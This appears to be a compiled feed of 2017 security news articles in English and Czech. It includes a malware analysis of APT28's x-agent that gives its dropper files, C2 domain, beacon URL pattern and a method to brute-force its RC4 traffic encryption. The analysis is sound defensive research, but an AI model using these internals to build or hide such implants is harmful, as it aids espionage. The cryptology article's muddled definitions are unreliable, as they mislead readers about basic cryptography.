He adds that this attack vector is still growing with the increasing use of third-party cloud services and applications, "which are exploited by hackers to compromise your trusted third-party and get access to your data afterwards... The report confirms Google's research, which found a 32% increase in website hacking in 2016. Application security becomes a major problem for organizations and should be addressed as a high priority," he suggests.
If there is any weakness in the DBIR as a guide for what to do today, it is that DBIR is an historical analysis of what has already happened in the recent past. For example, the report states that 51% of breaches included malware. On its own, this could persuade organizations to beef up their anti-malware defenses. However, because the analysis looks at past breaches rather than current threats, there is no clear indication of the current growth in non-malware attacks. Anti-malware defenses will not detect such attacks (which typically might use OS apps such as PowerShell) because there is no malware to detect.
Another example could be ransomware. Ransomware is difficult to place in the analysis because it is not a breach within Verizon's definition of breach (actual exfiltration of data), but clearly more than an incident. Furthermore, it is not unusual for infected organizations to decline to disclose the incident -- both of which factors could affect Verizon's statistics. To solve this issue, Verizon used telemetry data from McAFee for its information source.
McAfee's figures confirmed Verizon's own statistics -- that is, that the incidence of ransomware continues to rise -- but McAfee can provide greater detail. The difference is that McAfee's telemetry provides threat statistics, while the DBIR provides breach statistics. To get a complete view of the current situation, organizations need to consider both recent breaches and currently evolving threats.
Nevertheless, DBIR remains an invaluable resource for security practitioners. "From the beginning, it concludes, "our primary goal was, and still remains, to help organizations understand the threats they are facing, and enable them to make sound evidence-based risk management decisions."
Cryptology for Business and Organizations on the 21st century
27.4.2017 securityaffairs Safety
Cryptology is the mathematical foundation of penetration testing and can be adopted as a resource for securing assets and communications.
An overview of the science of the occult, that brings forth a new level of security in the age of digital privacy. Cryptology is the mathematical foundation of penetration testing and can be adopted as a resource for securing assets and communications. Join us in this quest into the science of occult.
Cryptology is the branch of mathematics that encompasses cryptography, cryptanalysis, Steganography and Lock picking. The etymology of the word is “kryptós +logos”, which means the study of the occult. Cryptography is a process in which an insecure message suffers a mathematical process generating a secure message from its process. The insecure message is called plaintext, and the encoded message is called ciphertext.
The reverse process of cryptography to obtain the plaintext from ciphertext is called cryptanalysis. Steganography is a mathematical function where a secret message is hidden in other secret messages. Lock picking is an attack in physical device of codification, where a key opens a lock.
Cryptology can give businesses and organizations a new degree of security when implemented by laying out an in-depth defense of data. A cryptograph algorithm, also called a cypher, is a mathematical function that is used for encryption and decryption of a message. Restricted algorithms maintain a secret how the algorithm works and can be compromised if the key is revealed to anyone. The range of all possible values of the key is called keyspace.
There are two types of symmetric algorithms: Symmetric and Public Key. Symmetric algorithms have the property of calculating the encryption key from the decryption key and vice versa. Symmetric algorithms can be divided into Block Ciphers and Stream Ciphers.
Public key algorithms, also called asymmetric algorithms, have the property of having a different encryption key for encryption and decryption. The decryption key cannot be calculated from the encryption key and the encryption key can be made public. The encryption key is called public key and the decryption key is called private key.
The main goal of cryptography is to provide confidentiality, authentication, integrity and nonrepudiation to the sender and the receiver of a communication. Cryptology is the mathematical foundation of modern day penetration testing. Penetration Testing uses some tools of cryptanalysis like THC Hydra in an attack, which is defined as a cryptanalysis attempt. The loss of a key through other means is called a compromise. Brute force, also called dictionary attack, is one case of cryptanalysis.
Cryptology is also related with penetration testing also in the security of the algorithm. Lars Knudsen classifies four types of breaking an algorithm: Total Break, Global Deduction, Instance Deduction and Information Deduction.
Cryptanalysis is used in Side Channel Attacks, where physical elements are analyzed and can give authorities and law enforcement agencies means of monitoring a suspect by generating a thermal image through the walls.
The Implications of the development of Cryptology and side channel attacks can permit law enforcement agencies a new degree of chain of custody with risking the lives of personnel while investigating suspects.
In Global Deduction Attack, cryptanalysis can find the key without knowing it but instead having an equivalent function that is accepted as the key. The study of discrete logarithms takes place in elliptic curves cryptanalysis, in which Pollard Rho attack is used to break into public key algorithms.
It is important to organizations and governments to develop and use Cryptology as a resource of protection aligned with other good practices adopted in the information security strategy. As of today, Cryptology can adapt to every business being incorporated in its best practices of security with a very low expenditure using open sources models like PGP.
The development in information security and cryptology together can help fill the gap in new talent sourcing and development of a national network of a labor force, and difficult attackers from gaining access to sensitive data.
Sources:
www.blackhat.com/presentations/bh-usa-07/De_Haas/Presentation/bh-usa-07-de_haas.pdf
Schneier, Bruce – Applied Cryptography – 2nd Edition.
http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/061112_1445_Chapter7The11.jpg
https://wongmichael.files.wordpress.com/2013/04/model-of-conventional-cryptosystem.png?w=300&h=252
http://openpgp.org/
http://truecrypt.sourceforge.net/
https://www.scmagazineuk.com/tel-aviv-team-first-to-steal-high-level-pc-crypto–through-a-wall/article/531456/
The Israeli Government announces it thwarted a major cyberattack
27.4.2017 securityaffairs CyberWar
The Israeli Government announces it thwarted a major cyberattack against 120 targets just days after harsh criticism of new cyber defense bill.
According to haaretz.com, Israeli Government revealed it repelled a major cyberattack
aimed at 120 targets.
The unusual announcement was made by the Prime Minister’s Office (PMO) in a very unusual announcement on Wednesday. Israel speculates the involvement of a foreign state behind the major cyberattack that hit the in recent days.
“The notice from the PMO comes only two days after the heads of the Shin Bet security service, the Mossad and the IDF’s deputy chief of staff, along with other senior defense officials, wrote a letter to Prime Minister Benjamin Netanyahu, warning that the numerous powers given to the Cyber Defense Authority could hamper the ability to thwart cyber attacks on Israel.” states Haaretz.
The defense officials ask the Prime Minister to halt the legislation of the bill and to review it in order to propose a new version.
“The draft bill seeks to grant extensive powers to the Cyber Authority, whose purpose has not been clearly defined, and it could seriously harm the core security activity of the security community in the cyber field,” said the letter signed by Shin Bet security service head Nadav Argaman, Mossad chief Yossi Cohen, Deputy Chief of General Staff Maj. Gen. Yair Golan (who is responsible for cyber defense issues in the army) and Defense Ministry Director General Udi Adam.
ity in the cyber field,” said the letter signed by Shin Bet security service head Nadav Argaman, Mossad chief Yossi Cohen, Deputy Chief of General Staff Maj. Gen. Yair Golan (who is responsible for cyber defense issues in the army) and Defense Ministry Director General Udi Adam.
The Israeli Cyber Defense Authority was responsible for defending the country networks against the attacks, recently it warned the Government of a massive planned cyber attack on Israel.
According to the Cyber Defense Authority, hackers impersonated a legitimate unnamed organization is a spear phishing campaign.
The phishing messages were crafted pretending to be sent from the servers of an academic institution and private a company. The phishing emails reached 120 Israeli institutions, government offices, and individuals, attackers exploited weaponized documents trying to exploit a vulnerability in Microsoft Word.
In response to the cyber attack, the Cyber Defense Authority issued directives for all Israeli citizens, businesses, and institutions, to instruct them on how to neutralize the attack and reduce the exposure to the cyber threats.
The criticized bill aims to regulate the activity of the Cyber Defense Authority, according to Buky Carmeli, the head of Authority, the law is on issuing protection guidelines to thousands of companies, organizations, and public agencies.
Carmeli says the diffusion of guidelines is crucial to protect the country from cyber attacks as well as to establish regulations for the cybersecurity and emergency management.
Hack'em If You Can — U.S. Air Force launches Bug Bounty Program
27.4.2017 thehackernews BigBrothers
With the growing number of data breaches and cyber attacks, a significant number of companies and organizations have started Bug Bounty programs for encouraging hackers and bug hunters to find and responsibly report vulnerabilities in their services and get rewarded.
Now, following the success of the "Hack the Pentagon" and "Hack the Army" initiatives, the United States Department of Defense (DoD) has announced the launch of the "Hack the Air Force" bug bounty program.
Hacking or breaking into Defense Department networks was illegal once, but after "Hack the Pentagon" initiative, the DoD started rewarding outsiders to finding and reporting weaknesses in its private networks.
"This is the first time the AF [Air Force] has opened up...networks to such a broad scrutiny," Peter Kim, the Air Force Chief Information Security Officer said in a statement. "We have malicious hackers trying to get into our systems every day."
"It'll be nice to have friendly hackers taking a shot and, most importantly, showing us how to improve our cyber security and defense posture. The additional participation from our partner nations greatly widens the variety of experience available to find additional unique vulnerabilities."
The "Hack the Air Force" program is directed by HackerOne, the bug bounty startup that was behind Hack the Pentagon, and Luta Security, the security consulting company driving the U.K. program.
Hackers From The Five Eyes Nations Are Invited
This program will be the DoD's largest bug bounty project as it invites experts and white hat hackers not only from the United States, but also from remaining Five Eyes countries: the United Kingdom, Canada, Australia and New Zealand.
So, only Hackers and bug hunters from the Five Eyes intelligence alliance are eligible to participate in Hack the Air Force.
"This outside approach – drawing on the talent and expertise of our citizens and partner nation citizens – in identifying our security vulnerabilities will help bolster our cyber security," said Air Force Chief of Staff Gen. David L. Goldfein.
"We already aggressively conduct exercises and 'red team' our public facing and critical websites. But this next step throws open the doors and brings additional talent onto our cyber team."
Only Vetted Hackers Can Participate
Only "Vetted Hackers" can participate in Hack the Air Force program, which means the candidates must pass a rigorous background test after registration and have a clean criminal record in order to participate in the program.
However, according to some critics, this process excludes many talented hackers and bug hunters, but this is one of the common conditions across all of the Pentagon's bug bounty programs.
Registration for "Hack the Air Force" will start on May 15 and interested participants should register through HackerOne. The contest will launch on May 30 and last until June 23.
The first DoD bug bounty program, "Hack the Pentagon," came in April 2016, in which over 14,000 participating hackers found 138 vulnerabilities in DoD systems and were awarded over $75,000 in bounties.
Just like Bug Bounty programs offered by several Frontliners in the technology industry, Hack the Air Force is also an exercise for the federal authorities to boost up their security measures and counter the cyber attacks.
Save the Internet: FCC Unveils Plan to Rollback Net-Neutrality Rules
27.4.2017 thehackernews IT
After crushing a set of privacy rules on ISPs that restrict them from sharing your online data with third parties without your consent, President Donald Trump's newly appointed FCC chairman Ajit Pai has announced the first move in its efforts to kill off Net Neutrality.
The US Federal Communications Commission (FCC) has announced that it will roll back net neutrality rules that require Internet service providers (ISPs) to treat all services and websites on the Internet equally.
Before moving forward, let’s first understand What does Net Neutrality mean?
What is Net Neutrality And Why It's Important?
Net Neutrality is simply the Internet Freedom — Free, Fast and Open Internet for all.
Net Neutrality is the principle that ISPs should give consumers access to all and every contents and application on an equal basis, treating all Internet traffic equally.
Today, if there is something that makes everyone across the world ‘Equal,’ it’s the Internet.
Equality over the Internet means, all ISPs have to treat Facebook or Google in the same way as your local shop website, and the richest man in the world has the same rights to access the Internet as the poorer.
And this is what "Net Neutrality" aims at.
FCC Unveils Plans to Kill Net Neutrality
But, What if someone snatches this Internet Freedom from you all? What if you have to pay ISPs extra for loading your website faster? What if you can't access your favorite website, which has been blocked by your ISP?
The FCC's new Chairman Pai is planning to do exactly same in the United States.
In a 400 page document released Wednesday, the FCC detailed its new plan which, if passed, would allow ISPs to give or sell access to "fast lanes" and block web traffic to others.
In other words, the new plan will allow ISPs to block access to legal content, restrain connections for users attempting to access certain sites or services and to be paid for prioritizing some lawful web traffic over other lawful web traffic.
This simply means if for example, you love watching movies and TV series on Netflix, Comcast and Verizon, which have their video services, will slow down the connections to its competing service when you try to access it, and you would eventually end up watching videos at the services they want you to use.
Here’s What FCC Chairman Excused About Reversing Net Neutrality Rules:
"We need rules that focus on growth and infrastructure investment, rules that expand high-speed Internet access everywhere. Rules that give Americans a more online choice, faster speeds, and more innovation," Pai said.
Pai argued that the 2015 regulations in the Obama administration had discouraged ISPs from investing in their networks, as well as slowed the expansion of internet access.
Also, ISPs are much more likely to strike valuable deals with large, established websites and services than relatively unknown companies or startups, which will be hit hardest by this new move.
"Without net neutrality, the incumbents who provide access to the Internet would be able to pick winners or losers in the market," reads a letter sent to Pai by a group of 800 startups.
"They could impede traffic from our services in order to favor their own services or established competitors. Or they could impose new tolls on us, inhibiting consumer choice. Those actions directly impede an entrepreneur’s ability to ‘start a business, immediately reach a worldwide customer base, and disrupt an entire industry."
Meanwhile, with no surprise, ISPs including Comcast, Verizon, and AT&T have welcomed the new plans.
The FCC will vote on the rollback of the FCC's 2015 regulations on May 18 and proposed rule change, but Mr. Pai has not revealed what he wants to replace the net neutrality rules with.
Once approved, the proposal will remove any legal power the FCC currently has to regulate ISPs, returning everything to the state it was before 2015.
Pai, who has openly expressed his views against net neutrality in the past, was previously quoted as saying that Net Neutrality was "a mistake" during a speech at Mobile World Congress.
The non-profit foundation Electronic Frontier Foundation (EFF) is encouraging people to take action before it gets too late and "tell Congress to stop the FCC from throwing Internet users and innovators to the wolves."
Hackeři se dostanou do PC kvůli chybě monitorů. V ohrožení jsou milióny zařízení
27.4.2017 Novinky/Bezpečnost Zranitelnosti
Počítačoví piráti zpravidla hledají různé bezpečnostní skuliny v operačním systému nebo v jednotlivých nainstalovaných aplikacích, aby si tak otevřeli zadní vrátka do cizích PC. I když to může znít na první pohled neuvěřitelně, stejně tak mohou zneužít k útoku monitory, respektive jejich ovládací software.
Chyba se týká ovládacího softwaru monitorů od společnosti Portrait Displays, který však využívá drtivá většina výrobců.
FOTO: repro portrait.com
Dnes 9:02
Na vážnou zranitelnost týkající se monitorů, kvůli čemuž jsou v ohrožení milióny počítačů, upozornil český Národní bezpečnostní tým CSIRT.CZ, který je provozován sdružením CZ.NIC.
„Byla identifikována bezpečnostní chyba v softwaru vyvinutém společností Portrait Displays, jejíž produkty využívá řada velkých výrobců, jako jsou Sony, HP, Acer, Fujitsu, Philips, Dell, Benq, Lenovo, Sharp a Toshiba,“ uvedl Pavel Bašta, bezpečnostní analytik CSIRT.CZ.
Hlavní problém je v tom, že na ovládací software společnosti Portrait Displays spoléhá tak velké množství výrobců. Právě proto je teoreticky v ohrožení tolik uživatelů. Žádné zneužití uvedené chyby však zatím bezpečnostní experti nezaznamenali.
Mohou převzít kontrolu nad napadeným strojem
„Společnost Portrait Displays, označila chybu, umožňující přihlášenému útočníkovi spustit libovolný kód a eskalovat systémová oprávnění, jako kritickou,“ konstatoval Bašta.
Podle něj mohou zneužít zranitelný software počítačoví piráti například k tomu, aby na napadeném stroji otočili obraz nebo změnili nastavení barev. Kromě těchto na první pohled neškodných vtípků ale bezpečnostní trhlinu mohou zneužít v krajním případě také k tomu, že převezmou kontrolu nad napadeným počítačem.
S ohledem na možná rizika by se tak uživatelé měli ze stránek jednotlivých výrobců stáhnout nejnovější aktualizace ovládacího softwaru, pokud jsou totiž k dispozici. Společnost Portrait Displays již totiž záplatu objevené chyby pro výrobce monitorů uvolnila.
Neinstalujte velkou aktualizaci Windows sami, radí Microsoft. Obsahuje totiž chyby
27.4.2017 Novinky/Bezpečnost Zabezpečení
Společnost Microsoft se snažila tento měsíc vylepšit operační systém Windows 10 prostřednictvím další velké aktualizace. Jak se ale ukázalo, tento dlouho očekávaný update obsahuje celou řadu chyb. Zástupci amerického softwarového gigantu proto vyzvali uživatele, aby si tzv. Creators update sami neinstalovali.
Balík aktualizací Creators update byl oficiálně vydán již před dvěma týdny. Je však nutné zdůraznit, že jej Microsoft od té doby automaticky nenabízí úplně všem uživatelům. Do služby Windows Update, která slouží k instalaci všech aktualizací od amerického softwarového gigantu, uvolňuje balík vylepšení jednotlivým uživatelům postupně.
Přímo na svých stránkách však Microsoft zároveň nabízel nástroj ke stažení, prostřednictvím kterého bylo možné instalaci nových funkcí urychlit. Právě to se ale ukázalo jako největší problém.
Problém s konkrétními hardwarovými konfiguracemi
Přestože pracovníci amerického softwarového gigantu testovali update několik posledních měsíců, vyzkoušet všechny různé hardwarové kombinace – tedy optimalizovat aktualizaci na milióny různých počítačů – evidentně nezvládli zcela korektně.
Někteří uživatelé si totiž po instalaci začali stěžovat na různé problémy. Například jas mohl být vždy po restartu nastaven na minimální úroveň, při hraní některých titulů přes celou obrazovku se stávalo, že se pak nešlo vrátit do samotného systému bez restartu, případně kvůli chybě v konfiguraci knihoven Windows Forms se antivirové programy nespustily korektně, a tudíž byly po celou dobu práce na PC nefunkční.
Hry je možné snadno streamovat.
Zástupci amerického softwarového gigantu proto nyní vyzvali uživatele, aby ve vlastním zájmu neinstalovali Creators Update sami, ale aby počkali až do chvíle, kdy se na jejich počítači objeví ve Windows Update. Právě to totiž bude znamenat, že byl otestován na danou hardwarovou konfiguraci.
To ale pochopitelně bude trvat pravděpodobně několik týdnů, v krajním případě klidně i několik měsíců.
Co přináší Creators Update
Creators update se dá přeložit jako aktualizace pro kreativce. A je to pravděpodobně nejvýstižnější pojmenování, které mohl americký softwarový gigant použít. Nové funkce totiž cílí právě na kreativce.
Americký softwarový gigant se s novou aktualizací zaměřil také na dovednosti operačního systému Windows 10 v oblasti 3D technologií. V novém Malování 3D lze vytvářet trojrozměrné objekty, jednoduše měnit barvy, přidávat nálepky nebo měnit 2D objekty v trojrozměrná umělecká díla. Výtvory lze navíc snadno sdílet s ostatními, využívat můžete 3D kresby ostatních i pro vlastní díla, pokud to jejich autoři dovolí.
Pozornost byla v aktualizaci věnována také hráčům. Svá zápolení s protivníky budou uživatelé moci snadno streamovat na internet. A to přímo z prostředí desítek, aniž by se museli někam přihlašovat či instalovat dodatečný software.
Jednoduše je možné vytvářet také turnaje, stačí k tomu pár kliknutí. Turnaje bude možné vytvářet prostřednictvím funkce Arena. V ní si uživatelé nastaví vlastní pravidla a určí, kdo přesně může hrát.
Další vylepšení se týkají prohlížeče Microsoft Edge, a to především komfortnosti použití, zároveň i otázky zabezpečení. Právě oblast zabezpečení a ochrany soukromí se vylepšila i v rámci celých desítek.
Bezpečnostní záplaty GrSecurity už nebudou k dispozici zdarma
27.4.2017 Root.cz Zranitelnosti
Brad Spengler oznámil, že bezpečnostní jaderné patche GrSecurity a PaX už nebudou nadále k dispozici zdarma. Dostanou se k nim jen platící zákazníci. Nyní je na komunitě, aby udržovala staré verze či je vyvíjela.
Projekt GrSecurity oznámil, že přestává vydávat veřejné testovací patche pro linuxové jádro a nadále se bude soustředit jen na platící zákazníky. S okamžitou platností byl veškerý kód z veřejného úložiště odstraněn a jádro 4.9 bylo schválně zvoleno jako poslední podporované veřejně dostupnými kód. Jedná se o LTS verzi jádra s prodlouženou podporou, takže uživatelé by měli mít dost času se změně přizpůsobit. K dispozici už nebudou ani žádné veřejné verze bezpečnostního rozšíření PaX.
Vývojář Brad Spengler se prý chce zaměřit na novou generaci bezpečnostních mechanizmů, které ochrání uživatele před moderními hrozbami. V oznámení o změně (+ FAQ) konkrétně zmiňuje zaměření na ARM64, Android, podporu RAP do stabilních jader, KERNSEAL, STRUCTGUARD a další moderní obranné mechanismy proti data-only útokům.
Stávajících platících zákazníků se prý změna nijak nedotkne, pokud je některá firma závislá na již neexistujících veřejných -test repozitářích, měla by se nově stát platícím zákazníkem. Ti pak budou mít přístup k -beta repozitářům s kódem pro nejnovější jádra.
Pro ostatní je tu špatná zpráva: žádné alternativní řešení podle Spenglera neexistuje. Linuxová komunita v posledních dvaceti letech selhala v investicích do bezpečnosti. Také proto tu není žádná přímá alternativa nebo jen možnost získat jiným způsobem alespoň část vlastností GrSecurity, píše se v oznámení, které odkazuje také na porovnání vlastností existujících linuxových bezpečnostních projektů.
Díky licenci GNU GPL 2 je tu samozřejmě šance, že linuxová komunita převezme doposud zveřejněné záplaty a někdo je bude udržovat a podporovat novější jádra. Sám autor to ale nechce dělat a odmítá staré verze zveřejňovat, prý proto, aby uživatele nepodporoval v používání starých nebezpečných jader. Zároveň upozorňuje na to, že název GrSecurity je chráněn registrovanou ochrannou známkou, takže pokud někdo bude nadále s kódem nakládat, musí tak činit pod jiným jménem.
GrSecurity je sada patchů pro linuxové jádro, které výrazně zvyšují bezpečnost systému a odolnost proti útokům. Existuje od roku 2001 a už téměř deset let ho Brad Spengler vyvíjí pod hlavičkou své společnosti Open Source Security, Inc. GrSecurity a PaX byly vždy velmi průkopnické projekty a jako první například do linuxového jádra přinesly podporu ASLR.
Brad Spengler je dlouhodobě nespokojený s tím, že jeho úpravy nebyly dobře přijímány v linuxové komunitě a jen malá část se dostala do jádra. Hlavním problémem vždy bylo, že se jedná o jeden obrovský nečleněný patch, jehož kvalita se navíc nelíbila Linusovi. Ten některé změny neváhal označit za „šílené“.
Proto se vývojáři rozhodli vytvářet svůj kód odděleně od jádra a dávat vývojové verze zdarma. Mnoho firem podle nich začalo patche používat, ale jen malá část byla ochotna zaplatit. Proto se autor už před dvěma lety rozhodl dodávat stabilní patche jen platícím zákazníkům. Nyní bylo toto omezení rozšířeno na veškerý kód, včetně testovacího.
Otázkou zůstává, zda je takový postup v souladu se zněním licence GNU GPL v2, pod kterou je vydáno linuxové jádro. Richard Stallman se už před časem vyjádřil v tom smyslu, že je takové jednání v rozporu s licencí. GrSecurity je modifikací kódu šířeného pod GNU GPL, ale autor se snaží bránit uživatelům ve sdílení výsledku, který musí být také pod stejnou licencí dostupný.
Cracking APT28 traffic in a few seconds
27.4.2017 securityaffairs APT
Security experts from security firm Redsocks published an interesting report on how to crack APT28 traffic in a few seconds.
Introduction
APT28 is a hacking group involved in many recent cyber incidents. The most recent attack allegedly attributed to this group is the one to French presidential candidate Emmanuel Macron’s campaign. Incident response to this Advanced Persistent Threats (APT) and damage limitation heavily relies on network traffic investigation.
In late 2016, Redsocks security identified one expired domain attributed to APT28. Our effort to sinkhole APT28 based on using this domain was impeded by the encrypted communication channel. Although many published white papers concerning APT28 such as ESET mentions RC4 encryption algorithm, they do not dig into the details of the used key and the details of APT28 implementation of RC4; whether the key is static and breakable. In this report, we aim to reveal the result of our comprehensive dynamic analysis of x-agent malware towards decrypting its traffic. We started our investigation by using one of the APT28 droppers (see Table 1).
The focus of our investigation has been decrypting APT28 communicated traffic. Thus, this report elaborates more on encryption functionality of x-agent and reports our finding on cracking x-agent communicated traffic. That said, our report is not limited to encryption cracking and sheds light on following:
Execution behavior of the dropper and x-agent
Network behavior of x-agent
Encryption of APT28 and an algorithm to crack it in few seconds
Following the encryption-decryption scheme we present, and by vast internet scanning and searching for the URL pattern we introduce in this white paper, current active APT28 servers and victims can be found. Communication to these servers for further investigation can be established.
X-agent dropper
The dropper functions in two steps. In the first step, it only unpacks a dll to the Windows folder. The name of the file is fixed (static) and it does not change by multiple executions or on different workstations. In the second step, the dropper loads the dll by calling ShellExecuteW function of shell32 library. This function is called by rundll32.exe, and “”C:\Windows\83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll”,init” as arguments. This means the trace of the malware, later, should be looked in rundll32 execution. The dropper also creates “ose00000.exe” file in the windows folder and calls it with arguments to the dll and the dropper path address. In summary, the dropper creates two files “83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll” and “ose00000.exe” in windows directory with hidden attribute (see Table 1 for the corresponding hashes) and loads one with rundll32.exe. The result of the dropper execution is rundll32.exe and ose00000.exe as two separate processes. No network activity was observed during dropper execution.
X-agent dropped rootkit
The dropper goal was to transfer control to 83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll (see Table 1 for SHA256 hash) which is a rootkit with keylogging and remote code execution capabilities.
X-agent architecture
x-agent has a sophisticated architecture; it has a modular structure in both functionalities and the communication channel implementation. Figure 1 presents the x-agent architecture of the sample we analyzed.
X-agent execution
The execution starts from init function of the loaded dll by rundll32. The first interesting event after transferring control to Init is a call to KERNEL32.GetVolumeInformationW. After this call, the Init function initializes the global variables:
Next, the init function initializes the available modules for execution (see ESET report on the explanation of modules). Our malware sample had 3 modules:
KeyLogging modules, dubbed in code as modKey
File system module, dubbed in code as modFS
Remote Shell module, dubbed in code as modProcRet
After initializing the data structure of these modules, CHOPSTICK creates different threads for different tasks. Modules are created in a loop based on their configuration and AgentKernel is created differently:
APT28
After creation of the threads, execution is transferred to AgentKernel and Module threads. Agent Kernel module initially prepares a message for the server and then waits for the server to respond with a command. The message intends to introduce the victim by an agent ID to the server and report the supported modules for execution. This message is written to edg6EF885E2.tmp file in the temp folder. The sample we analyzed communicates over HTTP channel. The implementation is using WININET APIs.
Before sending data, the channel thread checks the connectivity to the server. It, first, tries to resolve “adobeincorp.com” domain name. If it fails, it tries connecting to two hardcoded IP addresses. After successful connection to the server, it creates the URL request and post data based on the data prepared by other modules. X-agent first sends a get request and then a post request. The communication is always encrypted. We explain the nature of communicated data and the encryption method in the next section.
In summary, these sequences of actions happen in every execution of x-agent:
Call to KERNEL32.GetVolumeInformationW
Creation of at least 5 different threads
Read and write to edg6EF885E2.tmp in the temp directory
Check connectivity by call to socket.connect
Encrypt URL query string and POST data
Sends a get request
Sends a post request
Send supported commands and the agent number to server using WININET Http APIs.
X-agent traffic communication
In order to explain how to decrypt APT28 traffic, we first need to understand the traffic pattern of the malware. The x-agent version 1 we analyzed communicates by sending an initial GET request following by HTTP post requests. The http header values of the requests are hardcoded except one query string of the request. The URL of a x-agent traffic looks like:
/webhp?rel=psy&hl=7&ai=L2Bd93t_o-jl022K1Og4Bm9mSk8QO88K_3ZQZuKcoPwur-5Q7Y=
“/webhp?rel=psy&hl=7&ai=” part of the URL and the final “= “sign are persistent in different executions. As a matter of fact, “/webhp?rel=psy&hl=7&ai=” is hardcoded in the code. The next 51 bytes are not in plaintext; briefly, it contains the timestamp of the request and the ID of the agent. The initial POST data of x-agent is 71 bytes and ends with a = as well. The data is encrypted and when decrypted is equal to:
56 34 4D 47|4E 78 5A 57|6C 76 63 6D|68 6A 4F 47|39 79 5A 51|6B 30 84 F2|01 00 00 01|00 23 01 10|
23 01 11 23|01 13 23
The blue part is the ID of the agent (the victim). The yellow part is the ID of the module who sent the data. And finally, the green part is actually the list of modules separated by # character (0x23) that are installed and ready to be used by the server (see Figure 4 for more explanation).
Below is the Http implementation of the channel by x-agent:
X-agent traffic encryption
Encryption module
The encryption procedure is called with two arguments. The pointers are to two data structures. These data structures provide a reference to the two following data for the encryption class:
The seed for encryption
The data to be encrypted
The seed is hardcoded and, among others, the init function copies it to the data segment using immediate constants:
Later, in the code, 4 random bytes are appended to the seed and these altogether form the key for encryption. The seed is 50 bytes and the key length in total is 54 bytes. The data can be of variable size. For instance, the default initial request from AgentKernel is 39 bytes (see Figure 4) in total and includes: agent ID, module ID (the sender of the message) and the supported modules. The data is always appended to a 20 bytes data token, agent ID and the sender module ID. This data token is used for decryption result verification by the server. After creating the cypher using RC4 (see the next section), the encryption procedure adds a 8 random value to the message and then converts the whole binary string to URL compatible BASE64. . Next, the encryption procedure adds a 7-byte time stamp to the message. In summary the encryption class does the following:
Generate random 4 bytes
Encrypt the message using RC4
Add 8 random bytes to the message
Convert the binary string to BASE64
Add a timestamp to the message (7 bytes in BASE64)
RC4 function
RC4 is a stream cypher algorithm and is based on byte permutation. The elaborate explanation of RC4 is out of the scope of this paper. The below code is the implementation of RC4 algorithm by x-agent. The arguments to the function are 4 bytes random value, seed and the plaintext data:
CPU Disasm
How to decrypt x-agent data
As mentioned briefly, the only randomness in the x-agent encryption is a 4 random bytes appended to a 50 bytes seed that has been given in the previous section. Since RC4 is a synchronous stream cypher, one can decrypt the traffic only with the same key that is used for encryption. A decryption algorithm for x-agent must use the same RC4 function for decryption with the same arguments. The cypher input must be the same data byte stream from the http request i.e. the timestamp and random bytes must be stripped. The RC4 function must be called in a bruteforced way with all possible values from 0 to -1. This is a known plain-text attack since the result must contain “V4MGNxZWlvcmhjOG9yZQ”. The encryption must be broken in a matter of seconds with a normal personal computer.
Hack the Air Force bug bounty initiative is going to start
27.4.2017 securityaffairs BigBrothers
The United States Air Force has launched the ‘Hack the Air Force’ bug bounty program to test the security of its the networks and computer systems.
I have discussed many times the importance and the numerous advantages of a bug bounty program.
Bug bounties are very popular initiatives among the communities of white hats, principal companies, including Facebook, Google, and Microsoft. Facebook, for example, announced to have paid more than $3 million since 2011, when its bug bounty program was launched.
A year ago the Pentagon launched the ‘Hack the Pentagon’ initiative, the first-ever program of its kind, that aims to test the resilience to cyber attacks of the US defenses.
News of the day is that the United States Air Force has announced the ‘Hack the Air Force’ bug bounty program to test the security of its the networks and computer systems.
The initiative was announced yesterday by the US Air Force via a Facebook live stream, the bug bounty initiative is operated by the HackerOne and called ‘Hack the Air Force’.
White-hat hackers are invited to participate the progreamme to find security vulnerabilities affecting systems exposed on the Internet by the US Air Force.
The US Government will pay for any bug discovered under the ‘Hack the Air Force’ initiative.
“We have millions of probes a day, a week, on our DoD systems quite frankly. These are probably people out there, around the world, who particularly aren’t friendly with the Department of Defense. And they generally don’t tell us what’s wrong with our systems until we find out that something’s been hacked. And so I want to turn that around. I want to know beforehand where our vulnerabilities are. I know we have vulnerabilities, and I want to know where those are in the United States Air Force.” said Chief Information Security Officer Peter Kim.
Kim highlighted the importance of an external security assessment of the systems of the US Air Force, it is essential to discover the vulnerabilities before threat actors and bug bounty initiatives are very useful in this sense.
Researchers and white-hat hackers that want to participate in the challenge will need to register on the HackerOne website, then the operators behind the platform will make necessary the checks before granting the access to the programme.
Military members and government civilians are not eligible for compensation, they can anyway participate on-duty with supervisor approval.
Registration for Hack the Air Force is scheduled to begin May 15th and is open to United States, UK, Australian, New Zealand, and Canadian citizens. These states belong to the so-called states belong to the so-called states belong to the so-called Five Eyes intelligence alliance. The Hack the Air Force bug bounty program will run from May 30 to June 23.
Experts believe the US Government and the US Air Force may run other bug bounty initiatives in the future.
At the time I was writing there is no news about the total amount of money reserved for the initiative, the DoD’s Hack the Pentagon initiative paid $75,000 in bounties, the Department of Defense in the past have offered bounty payments of up to $150,000 for hackers who discover security vulnerabilities.
Hajime ‘Vigilante Botnet’ Growing Rapidly; Hijacks 300,000 IoT Devices Worldwide
27.4.2017 thehackernews BotNet
Hajime ‘Vigilante Botnet’ Growing Rapidly; Hijacks 300,000 IoT Devices Worldwide
Last week, we reported about a so-called 'vigilante hacker' who hacked into at least 10,000 vulnerable 'Internet of Things' devices, such as home routers and Internet-connected cameras, using a botnet malware in order to supposedly secure them.
Now, that vigilante hacker has already trapped roughly 300,000 devices in an IoT botnet known as Hajime, according to a new report published Tuesday by Kaspersky Lab, and this number will rise with each day that passes by.
The IoT botnet malware was emerged in October 2016, around the same time when the infamous Mirai botnet threatened the Internet last year with record-setting distributed denial-of-service (DDoS) attacks against the popular DNS provider Dyn.
How the Hajime IoT Botnet Works
Hajime botnet works much like Mirai by spreading itself via unsecured IoT devices that have open Telnet ports and uses default passwords and also uses the same list of username and password combinations that Mirai is programmed to use.
However, the interesting part of Hajime botnet is that, unlike Mirai, once Hajime infects an IoT devices, it secures the devices by blocking access to four ports (23, 7547, 5555, and 5358) known to be the most widely used vectors for infecting IoT devices, making Mirai or other threats out of their bay.
Hajime also uses a decentralized peer-to-peer network (instead of command-and-control server) to issue updates to infected devices, making it more difficult for ISPs and Internet providers to take down the botnet.
